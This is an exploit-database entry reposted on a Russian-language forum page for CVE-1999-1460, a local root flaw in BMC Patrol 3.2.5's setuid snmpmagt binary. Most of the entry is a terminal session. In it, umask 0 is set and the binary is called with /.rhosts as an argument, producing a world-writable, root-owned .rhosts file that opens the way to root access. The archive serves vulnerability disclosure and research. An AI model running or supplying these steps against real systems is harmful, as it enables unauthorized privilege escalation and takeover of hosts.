- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19422
- Проверка EDB
-
- Пройдено
- Автор
- ANDREW ALNESS
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-1999-1460
- Дата публикации
- 1999-07-14
BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission
Код:
source: https://www.securityfocus.com/bid/525/info
Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask.
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts
note: If the file exists, it keeps the same perms and overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP.- Источник
- www.exploit-db.com
